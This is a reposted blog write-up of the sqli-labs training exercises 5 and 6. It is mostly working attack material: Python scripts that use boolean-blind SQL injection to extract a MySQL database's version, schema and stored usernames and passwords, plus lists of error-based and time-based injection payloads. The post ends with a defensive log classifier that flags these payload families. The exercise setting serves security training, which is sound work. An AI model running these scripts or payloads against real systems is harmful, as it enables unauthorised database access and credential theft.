sqli-labs: 5-6, blind injection

Published: 2023/11/27  38  豆豆

Note 1: When both # and --+ are filtered, the only option left is to close the quote (or parenthesis) yourself.

Note 2: For UNION injection you must first determine the number of columns.

e.g. id=1' order by 3 and '1'='1


sqli5:

First, work out that id is wrapped in single quotes (').

Second, notice that query results are no longer echoed back.

OK, so it is blind injection. Determine the MySQL version first; if the version is old enough, a DNS side-channel (out-of-band) approach can be considered before anything else.

Boolean-based blind injection script (AND logic, using substr)

```python
# -*- coding: utf-8 -*-
"""
Created on Sat Mar 23 16:03:43 2019

@author: kenshin
"""

import requests, re

url = 'http://localhost/sqli-labs/Less-5/?id=1'
# the page shows this text only when the injected condition evaluates true
pattern_mark = 'You are in...........'

def get_version(url):
    # MySQL version format: x.x.xx
    # assume the version string is 6 characters long (digits at 1,3,5,6; dots at 2,4)
    lst = ['#' for x in range(0, 6)]
    lst[1] = lst[3] = '.'
    for i in (1, 3, 5, 6):
        for ii in range(48, 58):   # ASCII codes of '0'..'9'
            payload = "' and ascii(substr((select version())," + str(i) + ",1))=" + str(ii) + " --+"
            url_new = url + payload
            r = requests.get(url_new)
            if re.findall(pattern_mark, r.text):
                lst[i-1] = str(ii-48)
                break
    sr = ''.join(lst)
    print("the version of mysql:" + sr)

def get_user(url):
    # assume user() is at most 15 characters long
    lst = ['#' for x in range(0, 15)]
    for i in range(1, 16):
        for ii in 'qwertyuiopasdfghjklzxcvbnm1234567890_-@':
            payload = "' and substr((select user())," + str(i) + ",1)='" + ii + "' --+"
            url_new = url + payload
            r = requests.get(url_new)
            if re.findall(pattern_mark, r.text):
                lst[i-1] = ii
                print(ii)
                break
    sr = ''.join(lst)
    print("the user of database: " + sr)

def get_datadir(url):
    # assume @@datadir is at most 32 characters long
    lst = ['#' for x in range(0, 32)]
    for i in range(1, 33):
        for ii in ':\\qwertyuiopasdfghjklzxcvbnm1234567890_-':
            # a backslash has to be doubled inside the SQL string literal
            payload = "' and substr((select @@datadir)," + str(i) + ",1)='" + ii.replace('\\', '\\\\') + "' --+"
            url_new = url + payload
            r = requests.get(url_new)
            if re.findall(pattern_mark, r.text):
                lst[i-1] = ii
                print(ii)
                break
    sr = ''.join(lst)
    print(sr)

def get_currTB(url):
    # assume the current database has at most 10 tables [index i]
    for i in range(0, 10):
        # assume the longest table name is 10 characters [index ii]
        lst = ['#' for x in range(0, 10)]
        for ii in range(1, 11):
            # '#' is a sentinel: it never matches, so a miss on every character means the name has ended
            for iii in 'qwertyuiopasdfghjklzxcvbnm1234567890_-#':
                # the subquery must return exactly one column, so select table_name rather than *
                payload = "' and substr((select table_name from information_schema.tables where table_schema=database() limit " + str(i) + ",1)," + str(ii) + ",1)='" + str(iii) + "' --+"
                url_new = url + payload
                r = requests.get(url_new)
                if re.findall(pattern_mark, r.text):
                    lst[ii-1] = iii
                    print(iii)
                    break
            if lst[ii-1] == '#':
                break
        sr = ''.join(lst)
        print(sr)

def get_Column(url, tb):
    # assume the table has at most 3 columns [index i]
    for i in range(0, 3):
        # assume the longest column name is 10 characters
        lst = ['#' for x in range(0, 10)]
        for ii in range(1, 11):
            for iii in '@qwertyuiopasdfghjklzxcvbnm1234567890_-#':
                payload = "' and substr((select column_name from information_schema.columns where table_name='" + tb + "' limit " + str(i) + ",1)," + str(ii) + ",1)='" + str(iii) + "' --+"
                url_new = url + payload
                r = requests.get(url_new)
                if re.findall(pattern_mark, r.text):
                    lst[ii-1] = iii
                    print(iii)
                    break
            if lst[ii-1] == '#':
                break
        sr = ''.join(lst)
        print(sr)

def get_data(url):
    # assume the table has 10 rows [index i]
    for i in range(1, 11):
        # assume each row's concatenated data is at most 25 characters
        lst = ['#' for x in range(0, 25)]
        for ii in range(1, 26):
            # too many variables: the table and column names in this payload are set here in code, sorry
            for iii in '%@qwertyuiopasdfghjklzxcvbnm1234567890_-#':
                payload = "' and substr((select group_concat(id,'%',username,'%',password) from security.users where id=" + str(i) + ")," + str(ii) + ",1)='" + str(iii) + "' --+"
                url_new = url + payload
                r = requests.get(url_new)
                if re.findall(pattern_mark, r.text):
                    lst[ii-1] = iii
                    print(iii)
                    break
            if lst[ii-1] == '#':
                break
        sr = ''.join(lst)
        print(sr)

"""
dnslog
"""

#get_version(url)
#get_user(url)
#get_datadir(url)
#get_currTB(url)
#tb = input("select table >> ")
#get_Column(url,tb)
get_data(url)
```
v1: boolean blind injection script
```python
# -*- coding: utf-8 -*-
"""
Created on Sat Mar 23 16:03:43 2019

@author: kenshin
"""

import requests, re, time, sys

url = 'http://localhost/sqli-labs/Less-5/?id=1'
pattern_mark = 'You are in...........'

def view_bar(num, total):
    # simple in-place progress bar: [percent]=====>
    rate = num / total
    rate_num = int(rate * 100)
    r = '\r[%d%%]%s>' % (rate_num, '=' * num)
    sys.stdout.write(r)
    sys.stdout.flush()

def get_version(url):
    # MySQL version format: x.x.xx
    # assume the version string is 6 characters long (digits at 1,3,5,6; dots at 2,4)
    lst = ['#' for x in range(0, 6)]
    lst[1] = lst[3] = '.'
    for i in (1, 3, 5, 6):
        view_bar(i, 6)
        for ii in range(48, 58):   # ASCII codes of '0'..'9'
            payload = "' and ascii(substr((select version())," + str(i) + ",1))=" + str(ii) + " --+"
            url_new = url + payload
            r = requests.get(url_new)
            if re.findall(pattern_mark, r.text):
                lst[i-1] = str(ii-48)
                break
    sr = ''.join(lst)
    print("\nthe version of mysql:" + sr)

def get_user(url):
    # assume user() is at most 15 characters long
    lst = ['#' for x in range(0, 15)]
    for i in range(1, 16):
        view_bar(i, 15)
        for ii in 'qwertyuiopasdfghjklzxcvbnm1234567890_-@':
            payload = "' and substr((select user())," + str(i) + ",1)='" + ii + "' --+"
            url_new = url + payload
            r = requests.get(url_new)
            if re.findall(pattern_mark, r.text):
                lst[i-1] = ii
                break
    sr = ''.join(lst)
    print("\nthe user of database: " + sr)

def get_datadir(url):
    time_start = time.time()
    # assume @@datadir is at most 32 characters long
    lst = ['#' for x in range(0, 32)]
    for i in range(1, 33):
        view_bar(i, 32)
        for ii in ':\\qwertyuiopasdfghjklzxcvbnm1234567890_-':
            # a backslash has to be doubled inside the SQL string literal
            payload = "' and substr((select @@datadir)," + str(i) + ",1)='" + ii.replace('\\', '\\\\') + "' --+"
            url_new = url + payload
            r = requests.get(url_new)
            if re.findall(pattern_mark, r.text):
                lst[i-1] = ii
                break
    sr = ''.join(lst)
    print(sr)
    time_end = time.time()
    print("\ntotally cost: " + str(time_end - time_start) + "s")

def get_currTB(url):
    # assume the current database has at most 4 tables [index i]
    for i in range(0, 4):
        view_bar(i, 3)
        # assume the longest table name is 10 characters [index ii]
        lst = ['#' for x in range(0, 10)]
        for ii in range(1, 11):
            # '#' is a sentinel: it never matches, so a miss on every character means the name has ended
            for iii in 'qwertyuiopasdfghjklzxcvbnm1234567890_-#':
                payload = "' and substr((select table_name from information_schema.tables where table_schema=database() limit " + str(i) + ",1)," + str(ii) + ",1)='" + str(iii) + "' --+"
                url_new = url + payload
                r = requests.get(url_new)
                if re.findall(pattern_mark, r.text):
                    lst[ii-1] = iii
                    break
            if lst[ii-1] == '#':
                break
        sr = ''.join(lst)
        print("\n" + sr)

def get_Column(url, tb):
    # assume the table has at most 3 columns [index i]
    for i in range(0, 3):
        view_bar(i, 2)
        # assume the longest column name is 10 characters
        lst = ['#' for x in range(0, 10)]
        for ii in range(1, 11):
            for iii in '@qwertyuiopasdfghjklzxcvbnm1234567890_-#':
                payload = "' and substr((select column_name from information_schema.columns where table_name='" + tb + "' limit " + str(i) + ",1)," + str(ii) + ",1)='" + str(iii) + "' --+"
                url_new = url + payload
                r = requests.get(url_new)
                if re.findall(pattern_mark, r.text):
                    lst[ii-1] = iii
                    break
            if lst[ii-1] == '#':
                break
        sr = ''.join(lst)
        print("\n" + sr)

def get_data(url):
    time_start = time.time()
    # assume the table has 10 rows [index i]
    for i in range(1, 11):
        view_bar(i, 10)
        # assume each row's concatenated data is at most 25 characters
        lst = ['#' for x in range(0, 25)]
        for ii in range(1, 26):
            # too many variables: the table and column names in this payload are set here in code, sorry
            for iii in '%@qwertyuiopasdfghjklzxcvbnm1234567890_-#':
                payload = "' and substr((select group_concat(id,'%',username,'%',password) from security.users where id=" + str(i) + ")," + str(ii) + ",1)='" + str(iii) + "' --+"
                url_new = url + payload
                r = requests.get(url_new)
                if re.findall(pattern_mark, r.text):
                    lst[ii-1] = iii
                    break
            if lst[ii-1] == '#':
                break
        sr = ''.join(lst)
        print("\n" + sr)
    time_end = time.time()
    print("totally cost: " + str(time_end - time_start) + "s")

"""
dnslog
"""

#get_version(url)
#get_user(url)
#get_datadir(url)
#get_currTB(url)
#tb = input("select table >> ")
#get_Column(url,tb)
#get_data(url)
```
v2: adds a progress bar and timing


環(huán)境均為mysql 5.5.3

(left)

' and left(version(),1)=5--+(php5.2版本可用,瞎報)
' and left(database(),1)=>'a'--+(php5+版本可用

(substr)

' and substr((select database() limit 0,1),1,1)>'z'--+(php5+版本可用)

(regexp)

' and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^username')--+(php5+版本可用)

(mid)

' and mid((SELECT IFNULL(CAST(username AS CHAR),0x20) FROM security.users ORDER BY id LIMIT 0,1),1,1)='d'--+(php5+版本可用)

補充:ascill和ord()可將字符轉換為ascill碼


sqli-6

Here id is wrapped in double quotes (").

floor(rand(0)*2) error-based injection (works on PHP 5+)

-1' union Select 1,count(*),concat(0x7e,(select user()),0x7e,floor(rand(0)*2))a from information_schema.columns group by a--+ 
=>root@localhost (substitute database(), @@datadir, ... for user() in the same way)
-1' union select 1,count(*),concat(0x7e,(select schema_name from information_schema.schemata limit 4,1),0x7e,floor(rand(0)*2))a from information_schema.columns group by a--+
=>security
-1' union select 1,count(*),concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 3,1),0x7e,floor(rand(0)*2))a from information_schema.columns group by a--+
=>users
-1' union select 1,count(*),concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 2,1),0x7e,floor(rand(0)*2))a from information_schema.columns group by a--+
=>password
-1' union select 1,count(*),concat(0x7e,(select password from security.users limit 0,1),0x7e,floor(rand(0)*2))a from information_schema.columns group by a--+
=>Dump
```python
# -*- coding: utf-8 -*-
"""
Created on Sun Mar 24 09:56:20 2019

@author: kenshin
"""

import requests, re

url = 'http://localhost/sqli-labs/Less-5/?id=-1'
# the duplicate-key error message wraps the leaked value between the two 0x7e ('~') markers
pattern_mark = '~(.+?)~'

def get_currDB(url):
    payload = "' union select 1,count(*),concat(0x7e,(select database()),0x7e,floor(rand(0)*2))a from information_schema.columns group by a--+"
    url += payload
    r = requests.get(url)
    rst = re.findall(pattern_mark, r.text)
    print(rst)

get_currDB(url)
```
Script

XPath function error-based injection (extractvalue)

1' and extractvalue(1,concat(0x7e,(select @@version),0x7e)) --+
=>5.5.53

Exploiting duplicate data (NAME_CONST)

-1' union select 1,2,3 from (select NAME_CONST(version(),1), NAME_CONST(version(),1))x --+


updatexml

1' and (updatexml(1,concat(0x7e,(select user()),0x7e),1))--+


sleep() time-based injection

1' and If(substr(database(),1,1)='s',1,sleep(5))--+

BENCHMARK time-based injection

1' UNION SELECT (IF(SUBSTRING(current,1,1)='s',BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null)),2,3 FROM (select database() as current) as tb1--+
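As an added example (not part of the original post), the defender's side of everything above: a classifier that URL-decodes the query string of each access-log request and tags the families shown on this page (boolean-blind substr/ascii/left/mid/regexp, error-based floor(rand(0)*2)/extractvalue/updatexml/NAME_CONST, time-based sleep/BENCHMARK, union), then flags clients whose boolean-blind request count betrays a character-by-character extraction loop like the scripts above. The log lines, client addresses and the threshold of 20 requests are constructed assumptions.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# One pattern per technique family shown on this page, matched on the URL-decoded query string.
SIGNATURES = {
    "boolean_blind": re.compile(r"\b(?:substr|substring|mid|left|ascii|ord)\s*\(|regexp\s+'\^", re.I),
    "error_based": re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)|extractvalue\s*\(|updatexml\s*\(|name_const\s*\(", re.I),
    "time_based": re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I),
    "union": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
}
COMMENT_TAIL = re.compile(r"(?:--|#)\s*$")  # '--+' decodes to '-- ', which is why the payloads end with it
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "GET (\S+) HTTP/1\.[01]"')  # combined-log-format prefix

def classify(query):
    """Return the set of technique families found in a raw (still URL-encoded) query string."""
    decoded = unquote_plus(query)
    hits = {name for name, rx in SIGNATURES.items() if rx.search(decoded)}
    if hits and COMMENT_TAIL.search(decoded):
        hits.add("comment_terminated")
    return hits

def analyze(lines, blind_threshold=20):
    """Classify every GET; flag clients whose boolean-blind count reaches the threshold (one character costs up to ~40 probes)."""
    findings, blind_per_client = [], Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, path = m.groups()
        families = classify(path.partition("?")[2])
        if families:
            findings.append((client, sorted(families)))
        if "boolean_blind" in families:
            blind_per_client[client] += 1
    noisy = sorted(c for c, n in blind_per_client.items() if n >= blind_threshold)
    return findings, noisy

# Constructed sample log (not real traffic), shaped like the requests the scripts above generate.
def _line(ip, query):
    return f'{ip} - - [23/Mar/2019:16:03:43 +0800] "GET /sqli-labs/Less-5/?id={query} HTTP/1.1" 200 735'

SAMPLE_LOG = [_line("10.0.0.9", "1")] + [
    _line("10.0.0.5", f"1%27%20and%20ascii(substr((select%20version()),1,1))={c}%20--+")
    for c in range(48, 73)  # 25 probes: one boolean-blind loop over a single character position
] + [
    _line("10.0.0.7", "-1%27%20union%20select%201,count(*),concat(0x7e,(select%20user()),0x7e,floor(rand(0)*2))a%20from%20information_schema.columns%20group%20by%20a--+"),
    _line("10.0.0.7", "1%27%20and%20If(substr(database(),1,1)=%27s%27,1,sleep(5))--+"),
]
```

Run against SAMPLE_LOG, analyze() reports 27 suspicious requests and lists 10.0.0.5 as the client running an extraction loop; the single error-based and time-based requests from 10.0.0.7 are tagged but do not trip the volume threshold.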


Reposted from: https://www.cnblogs.com/p0pl4r/p/10584953.html
